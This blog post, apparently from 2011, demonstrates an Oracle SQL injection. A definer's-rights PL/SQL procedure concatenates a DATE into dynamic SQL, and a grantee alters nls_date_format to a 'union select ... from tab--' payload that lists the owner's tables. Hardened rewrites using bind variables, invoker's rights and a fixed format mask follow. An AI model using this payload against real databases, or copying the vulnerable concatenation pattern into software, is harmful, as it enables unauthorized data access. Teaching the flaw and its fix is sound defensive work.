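JSP SQL injection and Oracle: Oracle SQL injection

Today I was reading Tom's material, which mentioned something very interesting: merely granting EXECUTE on a procedure can be enough for someone else to perform SQL injection through it. Be careful with this from now on. My experiment follows.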

[oracle@aix ~]$ sqlplus anbob/anbob

SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011

Copyright (c) 1982, 2007, Oracle. All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE 10.2.0.4.0 Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production

SQL> select * from all_users;

USERNAME                          USER_ID CREATED
------------------------------ ---------- -------------------
ZYY                                  1099 2011-08-30 11:41:03
GZPX_DB                              1070 2011-08-30 11:41:01
GIAF                                 1069 2011-08-30 11:41:01
DEAN_TRAIN                           1068 2011-08-30 11:41:01
...

75 rows selected.

SQL> select * from tab;

TNAME                          TABTYPE  CLUSTERID
------------------------------ ------- ----------
TEST                           TABLE
TESTA                          TABLE
TESTB                          TABLE
TESTBLOB                       TABLE
TESTC                          TABLE
TESTIMG                        TABLE
TESTKDR                        TABLE
TESTXY                         TABLE

8 rows selected.

SQL> create or replace procedure badboy( p_date in date )
  2  as
  3      l_rec all_users%rowtype;
  4      c sys_refcursor;
  5      l_query long;
  6  begin
  7      l_query := 'select * from all_users where created = ''' ||p_date ||'''';
  8      dbms_output.put_line( l_query );
  9      open c for l_query;
 10      for i in 1 .. 10
 11      loop
 12          fetch c into l_rec;
 13          exit when c%notfound;
 14          dbms_output.put_line( l_rec.username || '.....' );
 15      end loop;
 16      close c;
 17  end;
 18  /

Procedure created.

SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'

PL/SQL procedure successfully completed.

SQL> grant execute on badboy to icme;

Grant succeeded.

SQL> conn icme/icme
Connected.
SQL> set serveroutput on
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'

PL/SQL procedure successfully completed.

SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';

Session altered.

SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....

PL/SQL procedure successfully completed.

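Heh, looks familiar, doesn't it? These are of course anbob's tables, and none of them were granted to icme. This works because concatenating p_date into the string implicitly converts the DATE to text using the caller's session nls_date_format, and the procedure runs with the privileges of its owner, anbob. In the same way the column names can be obtained from all_column, and from there part of the data in the tables...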
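Two hardened rewrites of badboy, as an added example that is not part of the original post: the first passes the date as a bind variable and runs with invoker's rights, the second shows an explicit fixed format mask for cases where the value has to be concatenated. The names goodboy and goodboy_concat are hypothetical.

```sql
-- Added example (not from the original post). goodboy / goodboy_concat are
-- hypothetical names for hardened rewrites of badboy.

-- 1) Bind variable: p_date stays a DATE, so there is no implicit
--    DATE-to-string conversion and the session nls_date_format never
--    reaches the SQL text. AUTHID CURRENT_USER additionally makes the
--    query run with the caller's privileges and name resolution
--    instead of the owner's.
create or replace procedure goodboy( p_date in date )
authid current_user
as
    l_rec all_users%rowtype;
    c     sys_refcursor;
begin
    open c for 'select * from all_users where created = :d' using p_date;
    for i in 1 .. 10
    loop
        fetch c into l_rec;
        exit when c%notfound;
        dbms_output.put_line( l_rec.username || '.....' );
    end loop;
    close c;
end;
/

-- 2) If concatenation cannot be avoided, convert with an explicit, fixed
--    format mask so the caller's session settings are never consulted.
create or replace procedure goodboy_concat( p_date in date )
as
    l_rec   all_users%rowtype;
    c       sys_refcursor;
    l_query varchar2(200);
begin
    l_query := 'select * from all_users where created = to_date('''
            || to_char( p_date, 'YYYY-MM-DD HH24:MI:SS' )
            || ''', ''YYYY-MM-DD HH24:MI:SS'')';
    dbms_output.put_line( l_query );
    open c for l_query;
    for i in 1 .. 10
    loop
        fetch c into l_rec;
        exit when c%notfound;
        dbms_output.put_line( l_rec.username || '.....' );
    end loop;
    close c;
end;
/
```

To check the fix, grant EXECUTE on either procedure to icme and repeat the session above with the altered nls_date_format; the printed query text from goodboy_concat should contain only the fixed-format timestamp.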
